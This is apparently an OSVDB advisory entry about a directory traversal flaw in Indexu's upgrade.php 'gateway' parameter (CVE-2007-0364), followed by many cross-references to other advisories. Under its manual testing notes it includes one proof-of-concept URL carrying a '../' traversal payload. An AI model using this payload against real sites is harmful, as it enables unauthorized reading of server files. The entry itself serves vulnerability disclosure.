Indexu upgrade.php gateway Variable Traversal Arbitrary File Access

2007-01-16T08:03:43
ID OSVDB:32839
Type osvdb
Reporter OSVDB
Modified 2007-01-16T08:03:43

Description

Manual Testing Notes

http://[target]/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=../index.php

References:

Secunia Advisory ID:23764 Related OSVDB ID: 32841 Related OSVDB ID: 32842 Related OSVDB ID: 32844 Related OSVDB ID: 32851 Related OSVDB ID: 32843 Related OSVDB ID: 32847 Related OSVDB ID: 32838 Related OSVDB ID: 32840 Related OSVDB ID: 32849 Related OSVDB ID: 32850 Related OSVDB ID: 32845 Related OSVDB ID: 32846 Related OSVDB ID: 32848 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0404.html ISS X-Force ID: 31538 FrSIRT Advisory: ADV-2007-0222 CVE-2007-0364 Bugtraq ID: 22084